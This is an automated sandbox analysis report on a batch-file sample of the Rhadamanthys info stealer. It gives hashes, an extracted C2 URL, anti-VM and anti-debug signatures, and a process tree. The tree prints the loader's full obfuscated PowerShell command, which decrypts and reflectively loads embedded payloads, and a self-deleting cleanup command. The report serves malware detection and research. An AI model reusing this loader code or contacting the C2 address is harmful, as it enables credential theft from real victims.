Analysis

  • max time kernel
    52s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/04/2023, 16:07

General

  • Target

    10FpDvByrqvHWUgFegBMjMmEkh.bat

  • Size

    189KB

  • MD5

    98b57df374d3888660dca7b8707aa9e5

  • SHA1

    4afb4626817228104bd752ba38650cef356e9afc

  • SHA256

    23f45fe1261dd687ee376dc36555a98b72ab76c70a330d8bd33e2bfa1d41aeb1

  • SHA512

    a21e4b1af9ddc7731356109bc1f2f75615db963e34666216c46e7b14bf28ac7f7c8432c060a2b67335111cf434cefa90de0e79e9b7c54a996c38d1fc79f26931

  • SSDEEP

    3072:jJ6sy+qsWPFiC5x1ElXP6RxLVYJdq7GOngOIxKtQPula2Mjr/L7pcTDlXMW5aOcT:hYs21xCIjLquDlIx91n/LCTDlXXHW

Malware Config

Extracted

Family

rhadamanthys

C2

http://185.224.129.51:8080/modlib/o6u3ke.661c

Signatures

  • Detect rhadamanthys stealer shellcode 3 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Enumerates VirtualBox registry keys 2 TTPs 5 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4464
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -c #
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3664
    • C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
      "C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe" function Dr($f){$f.Replace('AXQs', '')}$ezXk=Dr 'GeAXQstAXQsCuAXQsrAXQsrentAXQsPrAXQsocAXQsessAXQs';$Irdc=Dr 'ReAXQsadLiAXQsneAXQssAXQs';$GdQU=Dr 'InvAXQsokeAXQs';$oeNz=Dr 'FiAXQsrAXQssAXQstAXQs';$Skvh=Dr 'FAXQsromAXQsBasAXQse6AXQs4AXQsStrAXQsingAXQs';$Frss=Dr 'LoaAXQsdAXQs';$iCMB=Dr 'TAXQsrAXQsaAXQsnAXQssforAXQsmFAXQsinAXQsalAXQsBloAXQsckAXQs';$NIox=Dr 'CrAXQseaAXQstAXQseDeAXQscrAXQsyptAXQsorAXQs';$dXiP=Dr 'ChaAXQsngAXQseEAXQsxteAXQsnsiAXQsonAXQs';$Ethu=Dr 'EntrAXQsyAXQsPAXQsoAXQsinAXQstAXQs';function PiTFT($XOBWp,$PzVDp,$lwaqj){$zClni=[System.Security.Cryptography.Aes]::Create();$zClni.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zClni.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zClni.Key=[System.Convert]::$Skvh($PzVDp);$zClni.IV=[System.Convert]::$Skvh($lwaqj);$rFEvg=$zClni.$NIox();$WebjH=$rFEvg.$iCMB($XOBWp,0,$XOBWp.Length);$rFEvg.Dispose();$zClni.Dispose();$WebjH;}function WDCxf($XOBWp){$euCrm=New-Object System.IO.MemoryStream(,$XOBWp);$MDTEe=New-Object System.IO.MemoryStream;$wFbGM=New-Object System.IO.Compression.GZipStream($euCrm,[IO.Compression.CompressionMode]::Decompress);$wFbGM.CopyTo($MDTEe);$wFbGM.Dispose();$euCrm.Dispose();$MDTEe.Dispose();$MDTEe.ToArray();}function vGOdU($XOBWp,$PzVDp){[System.Reflection.Assembly]::$Frss([byte[]]$XOBWp).$Ethu.$GdQU($null,$PzVDp);}$ccWcY=[System.Linq.Enumerable]::$oeNz([System.IO.File]::$Irdc([System.IO.Path]::$dXiP([System.Diagnostics.Process]::$ezXk().MainModule.FileName, $null)));$lORZK = $ccWcY.Substring(3).Split('\');$xzfhv=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[0])) $lORZK[2] $lORZK[3]);$pmqpI=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[1])) $lORZK[2] $lORZK[3]);vGOdU $pmqpI $null;vGOdU $xzfhv $null;
      2⤵
      • Enumerates VirtualBox registry keys
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Looks for VirtualBox Guest Additions in registry
      • Looks for VMWare Tools registry key
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Checks system information in the registry
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:452
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(452);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:952

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

          Filesize

          53KB

          MD5

          06ad34f9739c5159b4d92d702545bd49

          SHA1

          9152a0d4f153f3f40f7e606be75f81b582ee0c17

          SHA256

          474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

          SHA512

          c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          3ca1082427d7b2cd417d7c0b7fd95e4e

          SHA1

          b0482ff5b58ffff4f5242d77330b064190f269d3

          SHA256

          31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

          SHA512

          bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          15KB

          MD5

          14f535a89ae7a7ad8adc7ca3517bf190

          SHA1

          9577803b11d41263e25d054b57f3a681d0ed55ef

          SHA256

          14e0ee5b3045a935c30813215a6a8faaad1bb86e3305a50e4ae6d05ba49469ce

          SHA512

          72f9c9823262d72377063e5058067b1b8bdf5c541732ea9ded243407e45201c08152f7c7bac0f2359a0e1c95e38b7e383efac9499cd14dd49db3ccf2c1648f67

        • C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe

          Filesize

          423KB

          MD5

          c32ca4acfcc635ec1ea6ed8a34df5fac

          SHA1

          f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

          SHA256

          73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

          SHA512

          6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

        • C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe

          Filesize

          423KB

          MD5

          c32ca4acfcc635ec1ea6ed8a34df5fac

          SHA1

          f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

          SHA256

          73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

          SHA512

          6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g2qamug0.d3r.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/452-172-0x0000000000400000-0x0000000000432000-memory.dmp

          Filesize

          200KB

        • memory/452-188-0x0000000002D80000-0x0000000002D90000-memory.dmp

          Filesize

          64KB

        • memory/452-154-0x0000000005700000-0x0000000005766000-memory.dmp

          Filesize

          408KB

        • memory/452-155-0x0000000005770000-0x00000000057D6000-memory.dmp

          Filesize

          408KB

        • memory/452-152-0x0000000002D80000-0x0000000002D90000-memory.dmp

          Filesize

          64KB

        • memory/452-166-0x0000000006620000-0x000000000663E000-memory.dmp

          Filesize

          120KB

        • memory/452-167-0x0000000002D80000-0x0000000002D90000-memory.dmp

          Filesize

          64KB

        • memory/452-168-0x0000000008E80000-0x00000000094FA000-memory.dmp

          Filesize

          6.5MB

        • memory/452-169-0x0000000006BF0000-0x0000000006C0A000-memory.dmp

          Filesize

          104KB

        • memory/452-151-0x0000000002D80000-0x0000000002D90000-memory.dmp

          Filesize

          64KB

        • memory/452-149-0x0000000002D00000-0x0000000002D36000-memory.dmp

          Filesize

          216KB

        • memory/452-150-0x0000000005820000-0x0000000005E48000-memory.dmp

          Filesize

          6.2MB

        • memory/452-198-0x0000000006AC0000-0x0000000006ADC000-memory.dmp

          Filesize

          112KB

        • memory/452-186-0x0000000002D80000-0x0000000002D90000-memory.dmp

          Filesize

          64KB

        • memory/452-187-0x0000000002D80000-0x0000000002D90000-memory.dmp

          Filesize

          64KB

        • memory/452-153-0x0000000005640000-0x0000000005662000-memory.dmp

          Filesize

          136KB

        • memory/452-197-0x0000000006AE0000-0x0000000006AE3000-memory.dmp

          Filesize

          12KB

        • memory/452-196-0x0000000006AE0000-0x0000000006AE2000-memory.dmp

          Filesize

          8KB

        • memory/452-193-0x0000000006AC0000-0x0000000006ADC000-memory.dmp

          Filesize

          112KB

        • memory/452-195-0x0000000006AC0000-0x0000000006ADC000-memory.dmp

          Filesize

          112KB

        • memory/952-191-0x00000000027A0000-0x00000000027B0000-memory.dmp

          Filesize

          64KB

        • memory/952-190-0x00000000027A0000-0x00000000027B0000-memory.dmp

          Filesize

          64KB

        • memory/952-184-0x00000000027A0000-0x00000000027B0000-memory.dmp

          Filesize

          64KB

        • memory/952-185-0x00000000027A0000-0x00000000027B0000-memory.dmp

          Filesize

          64KB

        • memory/952-202-0x0000000006640000-0x00000000066D6000-memory.dmp

          Filesize

          600KB

        • memory/952-203-0x00000000065D0000-0x00000000065F2000-memory.dmp

          Filesize

          136KB

        • memory/952-204-0x00000000078A0000-0x0000000007E44000-memory.dmp

          Filesize

          5.6MB

        • memory/952-205-0x00000000027A0000-0x00000000027B0000-memory.dmp

          Filesize

          64KB

        • memory/3664-133-0x000001DB290F0000-0x000001DB29112000-memory.dmp

          Filesize

          136KB